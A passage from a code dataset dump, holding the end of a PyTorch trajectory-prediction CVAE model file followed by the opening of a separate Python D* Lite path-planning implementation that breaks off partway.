self.hyperparams['kl_weight'],\n 'center_step': self.hyperparams['kl_crossover'],\n 'steps_lo_to_hi': self.hyperparams['kl_crossover'] / self.hyperparams[\n 'kl_sigmoid_divisor']\n })\n\n self.create_new_scheduler(name='latent.temp',\n annealer=exp_anneal,\n annealer_kws={\n 'start': self.hyperparams['tau_init'],\n 'finish': self.hyperparams['tau_final'],\n 'rate': self.hyperparams['tau_decay_rate']\n })\n\n self.create_new_scheduler(name='latent.z_logit_clip',\n annealer=sigmoid_anneal,\n annealer_kws={\n 'start': self.hyperparams['z_logit_clip_start'],\n 'finish': self.hyperparams['z_logit_clip_final'],\n 'center_step': self.hyperparams['z_logit_clip_crossover'],\n 'steps_lo_to_hi': self.hyperparams['z_logit_clip_crossover'] / self.hyperparams[\n 'z_logit_clip_divisor']\n },\n creation_condition=self.hyperparams['use_z_logit_clipping'])\n\n def step_annealers(self):\n # This should manage all of the step-wise changed\n # parameters automatically.\n for idx, annealed_var in enumerate(self.annealed_vars):\n if rgetattr(self, annealed_var + '_scheduler') is not None:\n # First we step the scheduler.\n with warnings.catch_warnings(): # We use a dummy optimizer: Warning because no .step() was called on it\n warnings.simplefilter(\"ignore\")\n rgetattr(self, annealed_var + '_scheduler').step()\n\n # Then we set the annealed vars' value.\n rsetattr(self, annealed_var, rgetattr(self, annealed_var + '_optimizer').param_groups[0]['lr'])\n\n self.summarize_annealers()\n\n def summarize_annealers(self):\n if self.log_writer is not None:\n for annealed_var in self.annealed_vars:\n if rgetattr(self, annealed_var) is not None:\n self.log_writer.add_scalar('%s/%s' % (str(), annealed_var.replace('.', '/')),\n rgetattr(self, annealed_var), self.curr_iter)\n\n def obtain_encoded_tensors(self,\n mode,\n inputs,\n inputs_st,\n labels,\n labels_st,\n first_history_indices) -> torch.Tensor:\n \"\"\"\n Encodes input and output tensors for node.\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param inputs: Input tensor including the state for each agent over time [bs, t, state].\n :param inputs_st: Standardized input tensor.\n :param labels: Label tensor including the label output for each agent over time [bs, t, pred_state].\n :param labels_st: Standardized label tensor.\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :return: tuple(x, y_e, y, n_s_t0)\n WHERE\n - x: Encoded input / condition tensor to the CVAE x_e.\n - y_e: Encoded label / future of the node.\n - y: Label / future of the node.\n - n_s_t0: Standardized current state of the node.\n \"\"\"\n\n x, y_e, y = None, None, None\n initial_dynamics = dict()\n\n batch_size = inputs.shape[0]\n\n #########################################\n # Provide basic information to encoders #\n #########################################\n node_history = inputs\n node_present_state = inputs[:, -1]\n node_pos = inputs[:, -1, 0:3]\n node_vel = inputs[:, -1, 3:6]\n\n node_history_st = inputs_st\n node_present_state_st = inputs_st[:, -1]\n node_pos_st = inputs_st[:, -1, 0:3]\n node_vel_st = inputs_st[:, -1, 3:6]\n\n n_s_t0 = node_present_state_st\n\n initial_dynamics['pos'] = node_pos\n initial_dynamics['vel'] = node_vel\n\n self.dynamic.set_initial_condition(initial_dynamics)\n\n ##################\n # Encode History #\n ##################\n node_history_encoded = self.encode_node_history(mode,\n node_history_st,\n first_history_indices)\n\n ##################\n # Encode Present #\n ##################\n node_present = node_present_state_st # [bs, state_dim]\n\n ##################\n # Encode Future #\n ##################\n if mode != ModeKeys.PREDICT:\n y = labels_st\n\n\n ######################################\n # Concatenate Encoder Outputs into x #\n ######################################\n x_concat_list = list()\n\n # Every node has a history encoder.\n x_concat_list.append(node_history_encoded) # [bs/nbs, enc_rnn_dim_history]\n\n x = torch.cat(x_concat_list, dim=1)\n\n if mode == ModeKeys.TRAIN or mode == ModeKeys.EVAL:\n y_e = self.encode_node_future(mode, node_present, y)\n\n return x, y_e, y, n_s_t0\n\n def encode_node_history(self, mode, node_hist, first_history_indices):\n \"\"\"\n Encodes the nodes history.\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param node_hist: Historic and current state of the node. [bs, mhl, state]\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :return: Encoded node history tensor. [bs, enc_rnn_dim]\n \"\"\"\n outputs, _ = run_lstm_on_variable_length_seqs(self.node_modules['/node_history_encoder'],\n original_seqs=node_hist,\n lower_indices=first_history_indices)\n\n outputs = F.dropout(outputs,\n p=1. - self.hyperparams['rnn_kwargs']['dropout_keep_prob'],\n training=(mode == ModeKeys.TRAIN)) # [bs, max_time, enc_rnn_dim]\n\n last_index_per_sequence = -(first_history_indices + 1)\n\n return outputs[torch.arange(first_history_indices.shape[0]), last_index_per_sequence]\n\n def encode_node_future(self, mode, node_present, node_future) -> torch.Tensor:\n \"\"\"\n Encodes the node future (during training) using a bi-directional LSTM\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param node_present: Current state of the node. [bs, state]\n :param node_future: Future states of the node. [bs, ph, state]\n :return: Encoded future.\n \"\"\"\n initial_h_model = self.node_modules['/node_future_encoder/initial_h']\n initial_c_model = self.node_modules['/node_future_encoder/initial_c']\n\n # Here we're initializing the forward hidden states,\n # but zeroing the backward ones.\n initial_h = initial_h_model(node_present)\n initial_h = torch.stack([initial_h, torch.zeros_like(initial_h, device=self.device)], dim=0)\n\n initial_c = initial_c_model(node_present)\n initial_c = torch.stack([initial_c, torch.zeros_like(initial_c, device=self.device)], dim=0)\n\n initial_state = (initial_h, initial_c)\n\n _, state = self.node_modules['/node_future_encoder'](node_future, initial_state)\n state = unpack_RNN_state(state)\n state = F.dropout(state,\n p=1. - self.hyperparams['rnn_kwargs']['dropout_keep_prob'],\n training=(mode == ModeKeys.TRAIN))\n\n return state\n\n\n def q_z_xy(self, mode, x, y_e) -> torch.Tensor:\n r\"\"\"\n .. math:: q_\\phi(z \\mid \\mathbf{x}_i, \\mathbf{y}_i)\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :param y_e: Encoded future tensor.\n :return: Latent distribution of the CVAE.\n \"\"\"\n xy = torch.cat([x, y_e], dim=1)\n\n if self.hyperparams['q_z_xy_MLP_dims'] is not None:\n dense = self.node_modules['/q_z_xy']\n h = F.dropout(F.relu(dense(xy)),\n p=1. - self.hyperparams['MLP_dropout_keep_prob'],\n training=(mode == ModeKeys.TRAIN))\n\n else:\n h = xy\n\n to_latent = self.node_modules['/hxy_to_z']\n return self.latent.dist_from_h(to_latent(h), mode)\n\n def p_z_x(self, mode, x):\n r\"\"\"\n .. math:: p_\\theta(z \\mid \\mathbf{x}_i)\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :return: Latent distribution of the CVAE.\n \"\"\"\n if self.hyperparams['p_z_x_MLP_dims'] is not None:\n dense = self.node_modules['/p_z_x']\n h = F.dropout(F.relu(dense(x)),\n p=1. - self.hyperparams['MLP_dropout_keep_prob'],\n training=(mode == ModeKeys.TRAIN))\n\n else:\n h = x\n\n to_latent = self.node_modules['/hx_to_z']\n return self.latent.dist_from_h(to_latent(h), mode)\n\n def project_to_GMM_params(self, tensor) -> torch.Tensor:\n \"\"\"\n Projects tensor to parameters of a GMM with N components and D dimensions.\n\n :param tensor: Input tensor.\n :return: tuple(log_pis, mus, log_sigmas, corrs)\n WHERE\n - log_pis: Weight (logarithm) of each GMM component. [N]\n - mus: Mean of each GMM component. [N, D]\n - log_sigmas: Standard Deviation (logarithm) of each GMM component. [N, D]\n - corrs: Correlation between the GMM components. [N]\n \"\"\"\n log_pis = self.node_modules['/decoder/proj_to_GMM_log_pis'](tensor)\n mus = self.node_modules['/decoder/proj_to_GMM_mus'](tensor)\n log_sigmas = self.node_modules['/decoder/proj_to_GMM_log_sigmas'](tensor)\n corrs = torch.tanh(self.node_modules['/decoder/proj_to_GMM_corrs'](tensor))\n return log_pis, mus, log_sigmas, corrs\n\n def p_y_xz(self, mode, x, n_s_t0, z_stacked, prediction_horizon,\n num_samples, num_components=1, gmm_mode=False):\n r\"\"\"\n .. math:: p_\\psi(\\mathbf{y}_i \\mid \\mathbf{x}_i, z)\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :param y: Future tensor.\n :param n_s_t0: Standardized current state of the node.\n :param z_stacked: Stacked latent state. [num_samples_z * num_samples_gmm, bs, latent_state]\n :param prediction_horizon: Number of prediction timesteps.\n :param num_samples: Number of samples from the latent space.\n :param num_components: Number of GMM components.\n :param gmm_mode: If True: The mode of the GMM is sampled.\n :return: GMM3D. If mode is Predict, also samples from the GMM.\n \"\"\"\n ph = prediction_horizon\n pred_dim = self.pred_state_length\n\n z = torch.reshape(z_stacked, (-1, self.latent.z_dim))\n zx = torch.cat([z, x.repeat(num_samples * num_components, 1)], dim=1)\n\n cell = self.node_modules['/decoder/rnn_cell']\n initial_h_model = self.node_modules['/decoder/initial_h']\n\n initial_state = initial_h_model(zx)\n\n log_pis, mus, log_sigmas, corrs, a_sample = [], [], [], [], []\n\n # Infer initial action state for node from current state\n a_0 = self.node_modules['/decoder/state_action'](n_s_t0)\n\n state = initial_state\n\n input_ = torch.cat([zx, a_0.repeat(num_samples * num_components, 1)], dim=1)\n outputs = []\n\n for j in range(ph):\n h_state = cell(input_, state)\n log_pi_t, mu_t, log_sigma_t, corr_t = self.project_to_GMM_params(h_state)\n\n gmm = GMM3D(log_pi_t, mu_t, log_sigma_t, corr_t) # [k;bs, pred_dim]\n\n if mode == ModeKeys.PREDICT and gmm_mode:\n a_t = gmm.mode()\n else:\n a_t = gmm.rsample()\n\n if num_components > 1:\n if mode == ModeKeys.PREDICT:\n log_pis.append(self.latent.p_dist.logits.repeat(num_samples, 1, 1))\n else:\n log_pis.append(self.latent.q_dist.logits.repeat(num_samples, 1, 1))\n else:\n log_pis.append(\n torch.ones_like(corr_t[...,0].reshape(num_samples, num_components, -1).permute(0, 2, 1).reshape(-1, 1))\n )\n\n mus.append(\n mu_t.reshape(\n num_samples, num_components, -1, 3\n ).permute(0, 2, 1, 3).reshape(-1, 3 * num_components)\n )\n log_sigmas.append(\n log_sigma_t.reshape(\n num_samples, num_components, -1, 3\n ).permute(0, 2, 1, 3).reshape(-1, 3 * num_components))\n corrs.append(\n corr_t.reshape(\n num_samples, num_components, -1\n ).permute(0, 2, 1).reshape(-1, 3* num_components))\n\n\n # dec_inputs = [zx, mu_t]\n dec_inputs = [zx, a_t]\n outputs.append(a_t)\n input_ = torch.cat(dec_inputs, dim=1)\n state = h_state\n\n log_pis = torch.stack(log_pis, dim=1)\n mus = torch.stack(mus, dim=1)\n log_sigmas = torch.stack(log_sigmas, dim=1)\n corrs = torch.stack(corrs, dim=1)\n outputs = torch.stack(outputs,dim=1)\n\n a_dist = GMM3D(torch.reshape(log_pis, [num_samples, -1, ph, num_components]),\n torch.reshape(mus, [num_samples, -1, ph, num_components * pred_dim]),\n torch.reshape(log_sigmas, [num_samples, -1, ph, num_components * pred_dim]),\n torch.reshape(corrs, [num_samples, -1, ph, num_components, 3]))\n\n if self.hyperparams['dynamic']['distribution']:\n y_dist = self.dynamic.integrate_distribution(a_dist, x)\n else:\n y_dist = a_dist\n\n if mode == ModeKeys.PREDICT:\n if gmm_mode:\n a_sample = a_dist.mode()\n else:\n a_sample = a_dist.rsample() \n sampled_future = self.dynamic.integrate_samples(a_sample, x)\n return y_dist, sampled_future\n else:\n return y_dist, outputs\n \n def p_y_xz2z(self, mode, x, n_s_t0, z_stacked, z_T,\n num_samples, ph_limit=100, num_components=1, gmm_mode=False):\n r\"\"\"\n .. math:: p_\\psi(\\mathbf{y}_i \\mid \\mathbf{x}_i, z)\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :param y: Future tensor.\n :param n_s_t0: Standardized current state of the node.\n :param z_stacked: Stacked latent state. [num_samples_z * num_samples_gmm, bs, latent_state]\n :param z_T: stop predicting at z_T\n :param num_samples: Number of samples from the latent space.\n :param num_components: Number of GMM components.\n :param gmm_mode: If True: The mode of the GMM is sampled.\n :return: GMM3D. If mode is Predict, also samples from the GMM.\n \"\"\"\n pred_dim = self.pred_state_length\n\n z = torch.reshape(z_stacked, (-1, self.latent.z_dim))\n zx = torch.cat([z, x.repeat(num_samples * num_components, 1)], dim=1)\n\n cell = self.node_modules['/decoder/rnn_cell']\n initial_h_model = self.node_modules['/decoder/initial_h']\n\n initial_state = initial_h_model(zx)\n\n log_pis, mus, log_sigmas, corrs, a_sample = [], [], [], [], []\n\n # Infer initial action state for node from current state\n a_0 = self.node_modules['/decoder/state_action'](n_s_t0)\n\n state = initial_state\n\n input_ = torch.cat([zx, a_0.repeat(num_samples * num_components, 1)], dim=1)\n outputs = []\n\n T = 1\n\n ph = 0\n while True:\n h_state = cell(input_, state)\n log_pi_t, mu_t, log_sigma_t, corr_t = self.project_to_GMM_params(h_state)\n\n gmm = GMM3D(log_pi_t, mu_t, log_sigma_t, corr_t) # [k;bs, pred_dim]\n\n if mode == ModeKeys.PREDICT and gmm_mode:\n a_t = gmm.mode()\n else:\n a_t = gmm.rsample()\n\n if num_components > 1:\n if mode == ModeKeys.PREDICT:\n log_pis.append(self.latent.p_dist.logits.repeat(num_samples, 1, 1))\n else:\n log_pis.append(self.latent.q_dist.logits.repeat(num_samples, 1, 1))\n else:\n log_pis.append(\n torch.ones_like(corr_t[...,0].reshape(num_samples, num_components, -1).permute(0, 2, 1).reshape(-1, 1))\n )\n\n mus.append(\n mu_t.reshape(\n num_samples, num_components, -1, 3\n ).permute(0, 2, 1, 3).reshape(-1, 3 * num_components)\n )\n log_sigmas.append(\n log_sigma_t.reshape(\n num_samples, num_components, -1, 3\n ).permute(0, 2, 1, 3).reshape(-1, 3 * num_components))\n corrs.append(\n corr_t.reshape(\n num_samples, num_components, -1\n ).permute(0, 2, 1).reshape(-1, 3* num_components))\n\n\n # dec_inputs = [zx, mu_t]\n dec_inputs = [zx, a_t]\n outputs.append(a_t)\n input_ = torch.cat(dec_inputs, dim=1)\n state = h_state\n ph += 1\n if ph > ph_limit:\n print(\"out ot ph_limit\")\n break\n if ph == 1:\n pos_mus = self.dynamic.initial_conditions['pos'].unsqueeze(1)[:, None].repeat(num_samples, 1, num_components, 1)\n else:\n pos_mus += mus[-1].reshape(num_samples, -1, num_components, pred_dim) * self.dynamic.dt\n if pos_mus[...,-1].mean() < z_T:\n break\n\n log_pis = torch.stack(log_pis, dim=1)\n mus = torch.stack(mus, dim=1)\n log_sigmas = torch.stack(log_sigmas, dim=1)\n corrs = torch.stack(corrs, dim=1)\n outputs = torch.stack(outputs,dim=1)\n\n a_dist = GMM3D(torch.reshape(log_pis, [num_samples, -1, ph, num_components]),\n torch.reshape(mus, [num_samples, -1, ph, num_components * pred_dim]),\n torch.reshape(log_sigmas, [num_samples, -1, ph, num_components * pred_dim]),\n torch.reshape(corrs, [num_samples, -1, ph, num_components, 3]))\n\n if self.hyperparams['dynamic']['distribution']:\n y_dist = self.dynamic.integrate_distribution2zT(a_dist, z_T)\n else:\n y_dist = a_dist\n\n if mode == ModeKeys.PREDICT:\n if gmm_mode:\n a_sample = a_dist.mode()\n else:\n a_sample = a_dist.rsample() \n sampled_future = self.dynamic.integrate_samples(a_sample, x)\n return y_dist, sampled_future\n else:\n return y_dist, outputs\n\n def encoder(self, mode, x, y_e, num_samples=None):\n \"\"\"\n Encoder of the CVAE.\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :param y_e: Encoded future tensor.\n :param num_samples: Number of samples from the latent space during Prediction.\n :return: tuple(z, kl_obj)\n WHERE\n - z: Samples from the latent space.\n - kl_obj: KL Divergenze between q and p\n \"\"\"\n if mode == ModeKeys.TRAIN:\n sample_ct = self.hyperparams['k']\n elif mode == ModeKeys.EVAL:\n sample_ct = self.hyperparams['k_eval']\n elif mode == ModeKeys.PREDICT:\n sample_ct = num_samples\n if num_samples is None:\n raise ValueError(\"num_samples cannot be None with mode == PREDICT.\")\n\n self.latent.q_dist = self.q_z_xy(mode, x, y_e)\n self.latent.p_dist = self.p_z_x(mode, x)\n\n z = self.latent.sample_q(sample_ct, mode)\n\n if mode == ModeKeys.TRAIN:\n kl_obj = self.latent.kl_q_p(self.log_writer, '%s' % str(), self.curr_iter)\n if self.log_writer is not None:\n self.log_writer.add_scalar('%s/%s' % (str(), 'kl'), kl_obj, self.curr_iter)\n else:\n kl_obj = None\n\n return z, kl_obj\n\n def decoder(self, mode, x, y, n_s_t0, z, labels, prediction_horizon, num_samples):\n \"\"\"\n Decoder of the CVAE.\n\n :param mode: Mode in which the model is operated. E.g. Train, Eval, Predict.\n :param x: Input / Condition tensor.\n :param y: Future tensor.\n :param n_s_t0: Standardized current state of the node.\n :param z: Stacked latent state.\n :param prediction_horizon: Number of prediction timesteps.\n :param num_samples: Number of samples from the latent space.\n :return: Log probability of y over p.\n \"\"\"\n\n num_components = self.hyperparams['N'] * self.hyperparams['K']\n y_dist, outputs = self.p_y_xz(mode, x, n_s_t0, z,\n prediction_horizon, num_samples, num_components=num_components)\n log_p_yt_xz = torch.clamp(y_dist.log_prob(labels), max=self.hyperparams['log_p_yt_xz_max'])\n mseloss,_ = torch.min(torch.mean((outputs.reshape((-1,)+labels.shape) -labels.unsqueeze(0))**2,dim=(2,3)),dim=0)\n mseloss = mseloss.mean()\n # prob = (y_dist.log_pis/torch.sum(y_dist.log_pis,-1,keepdim=True)).unsqueeze(-1)\n # pred = torch.sum(prob*y_dist.mus,dim=-2).squeeze(0)\n # mse = torch.sqrt(torch.mean((labels - pred)**2,dim=-2)).mean(0).sum(0)\n \n if self.hyperparams['log_histograms'] and self.log_writer is not None:\n self.log_writer.add_histogram('%s/%s' % (str(), 'log_p_yt_xz'), log_p_yt_xz, self.curr_iter)\n\n log_p_y_xz = torch.sum(log_p_yt_xz, dim=2)\n return log_p_y_xz, mseloss\n\n def train_loss(self,\n inputs,\n inputs_st,\n first_history_indices,\n labels,\n labels_st,\n prediction_horizon) -> torch.Tensor:\n \"\"\"\n Calculates the training loss for a batch.\n\n :param inputs: Input tensor including the state for each agent over time [bs, t, state].\n :param inputs_st: Standardized input tensor.\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :param labels: Label tensor including the label output for each agent over time [bs, t, pred_state].\n :param labels_st: Standardized label tensor.\n :param prediction_horizon: Number of prediction timesteps.\n :return: Scalar tensor -> nll loss\n \"\"\"\n mode = ModeKeys.TRAIN\n\n x, y_e, y, n_s_t0 = self.obtain_encoded_tensors(mode=mode,\n inputs=inputs,\n inputs_st=inputs_st,\n labels=labels,\n labels_st=labels_st,\n first_history_indices=first_history_indices)\n\n z, kl = self.encoder(mode, x, y_e)\n log_p_y_xz, mseloss = self.decoder(mode, x, y, n_s_t0, z,\n labels, # Loss is calculated on unstandardized label\n prediction_horizon,\n self.hyperparams['k'])\n\n log_p_y_xz_mean = torch.mean(log_p_y_xz, dim=0) # [nbs]\n log_likelihood = torch.mean(log_p_y_xz_mean)\n\n mutual_inf_q = mutual_inf_mc(self.latent.q_dist)\n mutual_inf_p = mutual_inf_mc(self.latent.p_dist)\n\n ELBO = log_likelihood - self.kl_weight * kl + 1. * mutual_inf_p\n loss = -ELBO + mseloss\n\n if self.hyperparams['log_histograms'] and self.log_writer is not None:\n self.log_writer.add_histogram('%s/%s' % (str(), 'log_p_y_xz'),\n log_p_y_xz_mean,\n self.curr_iter)\n\n if self.log_writer is not None:\n self.log_writer.add_scalar('%s/%s' % (str(), 'mutual_information_q'),\n mutual_inf_q,\n self.curr_iter)\n self.log_writer.add_scalar('%s/%s' % (str(), 'mutual_information_p'),\n mutual_inf_p,\n self.curr_iter)\n self.log_writer.add_scalar('%s/%s' % (str(), 'log_likelihood'),\n log_likelihood,\n self.curr_iter)\n self.log_writer.add_scalar('%s/%s' % (str(), 'loss'),\n loss,\n self.curr_iter)\n if self.hyperparams['log_histograms']:\n self.latent.summarize_for_tensorboard(self.log_writer, str(), self.curr_iter)\n return loss\n\n def eval_loss(self,\n inputs,\n inputs_st,\n first_history_indices,\n labels,\n labels_st,\n prediction_horizon) -> torch.Tensor:\n \"\"\"\n Calculates the evaluation loss for a batch.\n\n :param inputs: Input tensor including the state for each agent over time [bs, t, state].\n :param inputs_st: Standardized input tensor.\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :param labels: Label tensor including the label output for each agent over time [bs, t, pred_state].\n :param labels_st: Standardized label tensor.\n :param prediction_horizon: Number of prediction timesteps.\n :return: tuple(nll_q_is, nll_p, nll_exact, nll_sampled)\n \"\"\"\n\n mode = ModeKeys.EVAL\n\n x, y_e, y, n_s_t0 = self.obtain_encoded_tensors(mode=mode,\n inputs=inputs,\n inputs_st=inputs_st,\n labels=labels,\n labels_st=labels_st,\n first_history_indices=first_history_indices)\n\n num_components = self.hyperparams['N'] * self.hyperparams['K']\n ### Importance sampled NLL estimate\n z, _ = self.encoder(mode, x, y_e) # [k_eval, nbs, N*K]\n z = self.latent.sample_p(1, mode, full_dist=True)\n y_dist, _ = self.p_y_xz(ModeKeys.PREDICT, x, n_s_t0, z,\n prediction_horizon, num_samples=1, num_components=num_components)\n # We use unstandardized labels to compute the loss\n log_p_yt_xz = torch.clamp(y_dist.log_prob(labels), max=self.hyperparams['log_p_yt_xz_max'])\n log_p_y_xz = torch.sum(log_p_yt_xz, dim=2)\n log_p_y_xz_mean = torch.mean(log_p_y_xz, dim=0) # [nbs]\n log_likelihood = torch.mean(log_p_y_xz_mean)\n nll = -log_likelihood\n\n return nll\n\n def predict(self,\n inputs,\n inputs_st,\n first_history_indices,\n prediction_horizon,\n num_samples,\n z_mode=False,\n gmm_mode=False,\n full_dist=True,\n all_z_sep=False,\n dist=False):\n \"\"\"\n Predicts the future of a batch of nodes.\n\n :param inputs: Input tensor including the state for each agent over time [bs, t, state].\n :param inputs_st: Standardized input tensor.\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :param prediction_horizon: Number of prediction timesteps.\n :param num_samples: Number of samples from the latent space.\n :param z_mode: If True: Select the most likely latent state.\n :param gmm_mode: If True: The mode of the GMM is sampled.\n :param all_z_sep: Samples each latent mode individually without merging them into a GMM.\n :param full_dist: Samples all latent states and merges them into a GMM as output.\n :return:\n \"\"\"\n mode = ModeKeys.PREDICT\n\n x, _, _, n_s_t0 = self.obtain_encoded_tensors(mode=mode,\n inputs=inputs,\n inputs_st=inputs_st,\n labels=None,\n labels_st=None,\n first_history_indices=first_history_indices)\n\n self.latent.p_dist = self.p_z_x(mode, x)\n z, num_samples, num_components = self.latent.sample_p(num_samples,\n mode,\n most_likely_z=z_mode,\n full_dist=full_dist,\n all_z_sep=all_z_sep)\n\n y_dist, our_sampled_future = self.p_y_xz(mode, x, n_s_t0, z,\n prediction_horizon,\n num_samples,\n num_components,\n gmm_mode)\n if dist == True:\n return y_dist, our_sampled_future\n return our_sampled_future\n\n def predict2(self,\n inputs,\n inputs_st,\n first_history_indices,\n z_T,\n num_samples,\n z_mode=False,\n gmm_mode=False,\n full_dist=True,\n all_z_sep=False,\n dist=False,\n ph_limit=100):\n \"\"\"\n Predicts the future of a batch of nodes.\n\n :param inputs: Input tensor including the state for each agent over time [bs, t, state].\n :param inputs_st: Standardized input tensor.\n :param first_history_indices: First timestep (index) in scene for which data is available for a node [bs]\n :param prediction_horizon: Number of prediction timesteps.\n :param num_samples: Number of samples from the latent space.\n :param z_mode: If True: Select the most likely latent state.\n :param gmm_mode: If True: The mode of the GMM is sampled.\n :param all_z_sep: Samples each latent mode individually without merging them into a GMM.\n :param full_dist: Samples all latent states and merges them into a GMM as output.\n :return:\n \"\"\"\n mode = ModeKeys.PREDICT\n\n x, _, _, n_s_t0 = self.obtain_encoded_tensors(mode=mode,\n inputs=inputs,\n inputs_st=inputs_st,\n labels=None,\n labels_st=None,\n first_history_indices=first_history_indices)\n\n self.latent.p_dist = self.p_z_x(mode, x)\n z, num_samples, num_components = self.latent.sample_p(num_samples,\n mode,\n most_likely_z=z_mode,\n full_dist=full_dist,\n all_z_sep=all_z_sep)\n\n y_dist, our_sampled_future = self.p_y_xz2z(mode, x, n_s_t0, z,\n z_T,\n num_samples,\n ph_limit,\n num_components,\n gmm_mode)\n if dist == True:\n return y_dist, our_sampled_future\n return our_sampled_future\n \n def get_latent(self,\n inputs,\n inputs_st,\n first_history_indices,\n labels,\n labels_st,\n prediction_horizon) -> torch.Tensor:\n\n mode = ModeKeys.TRAIN\n\n x, _, _, n_s_t0 = self.obtain_encoded_tensors(mode=mode,\n inputs=inputs,\n inputs_st=inputs_st,\n labels=labels,\n labels_st=labels_st,\n first_history_indices=first_history_indices)\n return x\n","repo_name":"mousecpn/Robot-Trajectron","sub_path":"model/mgcvae.py","file_name":"mgcvae.py","file_ext":"py","file_size_in_byte":42484,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"43234604310","text":"###############################################\n# D* Lite\n# Susan Fox\n# Spring 2016\n\n\"\"\"This file contains an implementation of D* Lite. Because of the different\\\npieces of this algorithm, and their need to access a lot of shared data, and\\\nthe way in which the algorithm must be restarted when new information comes in, it\nmade sense to make a class to contain the information. I have separated the outer loop, where\nit computes shortest path and then waits for new information, into external functions. The purpose of\nthe class is to contain the information that is generated, including the priority queue,\nand to respond with methods that implement the key features of the algorithm.\"\"\"\n\nimport random\nfrom FoxQueue import Queue, PriorityQueue\nimport time\nimport math\n\n\nclass DStarAlgorithm:\n\n def __init__(self, graph, startVert, goalVert):\n \"\"\"Takes in a graph, start vertex and goal vertex, and sets up the D* Lite\n search, initializing all the data structures and the priority queue.\"\"\"\n self.graph = graph\n self.startVert = startVert\n self.goalVert = goalVert\n self.maxVal = 1000\n\n self.rhs = {}\n self.pred = {}\n self.g = {}\n self.u = None\n\n self.initialize()\n\n def initialize(self):\n \"\"\"The Initialize algorithm from the pseudocode.\"\"\"\n self.u = PriorityQueue()\n vertices = self.graph.getVertices()\n for vert in vertices:\n self.rhs[vert] = self.maxVal\n self.g[vert] = self.maxVal\n self.rhs[self.startVert] = 0\n self.u.insert(priority=self.calculateKey(\n self.startVert), val=self.startVert)\n\n def computeShortestPath(self):\n \"\"\"The ComputeShortestPath algorithm from the pseudocode.\"\"\"\n while (not self.u.isEmpty()) and (self.compareKeys(self.u.firstElement()[0], self.calculateKey(self.goalVert))) or (self.rhs[self.goalVert] != self.g[self.goalVert]):\n # The first element has the form (priority, value)\n # print(\"=====> \", self.u.firstElement())\n vert = self.u.firstElement()[1]\n # print(vert)\n\n self.u.delete()\n\n if self.g[vert] > self.rhs[vert]:\n self.g[vert] = self.rhs[vert]\n else:\n self.g[vert] = self.maxVal\n self.updateVertex(vert)\n\n vertNeighbors = self.graph.getNeighbors(vert)\n # Get neighbor returns a list in the form of (vert, weight)\n for v in vertNeighbors:\n # Using v[0] to only take out the vert, not with the weight\n # print(\"====>\", v)\n v = v[0]\n self.updateVertex(v)\n return self.reconstructPath()\n\n def updateVertex(self, vert):\n \"\"\"The UpdateVertex algorithm from the pseudocode.\"\"\"\n if vert != self.startVert:\n self.rhs[vert] = self.minNeighCost(vert)\n if self.u.contains(vert):\n self.u.removeValue(value=vert)\n if self.g[vert] != self.rhs[vert]:\n self.u.insert(self.calculateKey(vert), vert)\n # print(self.u)\n\n def minNeighCost(self, vert):\n \"\"\"A helper to compute the new rhs value, by finding the minimum cost among\n all the neighbors of a vertex. The cost is computed as the g cost of the\n neighbor plus the edge cost between the neighbor and the vertex.\"\"\"\n minNCost = self.maxVal\n minVert = -1\n for neighInfo in self.graph.getNeighbors(vert):\n neigh = neighInfo[0]\n edgeCost = neighInfo[1]\n newCost = self.g[neigh] + edgeCost\n if newCost < minNCost:\n minNCost = newCost\n minVert = neigh\n return minNCost\n\n def calculateKey(self, vert):\n \"\"\"The CalculateKey algorithm from the pseudocode.\"\"\"\n minG = min(self.g[vert], self.rhs[vert])\n heurCost = self.graph.heuristicDist(vert, self.goalVert)\n return [minG + heurCost, minG]\n\n def compareKeys(self, key1, key2):\n \"\"\"Takes in two keys, each of which is a list containing f cost\n and g cost. It prefers the lower f cost, but for equal f costs\n it chooses the lower g cost.\"\"\"\n [f1, g1] = key1\n [f2, g2] = key2\n return (f1 < f2) or ((f1 == f2) and (g1 < g2))\n\n def correctInformation(self, newInfo):\n \"\"\"Takes in a dictionary whose keys are (r, c) tuples, and the value\n is the newly corrected cell weight. Updates the graph, and then updates\n the search information appropriately.\"\"\"\n for (r, c) in newInfo:\n self.graph.setCellValue(r, c, newInfo[r, c])\n self.graph.graphFromGrid()\n for (r, c) in newInfo:\n nodeNum = r * self.graph.getWidth() + c\n #print(\"(\", r, c, \")\", nodeNum)\n self.updateVertex(nodeNum)\n neighs = self.graph.getNeighbors(nodeNum)\n for (nextNeigh, wgt) in neighs:\n self.updateVertex(nextNeigh)\n\n def reconstructPath(self):\n \"\"\" Given the start vertex and goal vertex, and the table of\n predecessors found during the search, this will reconstruct the path\n from start to goal\"\"\"\n\n path = [self.goalVert]\n currVert = self.goalVert\n while currVert != self.startVert:\n currVert = self._pickMinNeighbor(currVert)\n path.insert(0, currVert)\n return path\n\n def _pickMinNeighbor(self, vert):\n \"\"\"A helper to path-reconstruction that finds the neighbor of a vertex\n that has the minimum g cost.\"\"\"\n neighs = self.graph.getNeighbors(vert)\n minVal = self.maxVal\n minNeigh = None\n for [neigh, cost] in neighs:\n if self.g[neigh] < minVal:\n minVal = self.g[neigh]\n minNeigh = neigh\n return minNeigh\n\n\n# ---------------------------------------------------------------\ndef DStarRoute(graph, startVert, goalVert):\n \"\"\" This algorithm searches a graph using D* Lite looking for a path from\n some start vertex to some goal vertex It uses a queue to store the\n indices of vertices that it still needs to examine. This version of D*\n 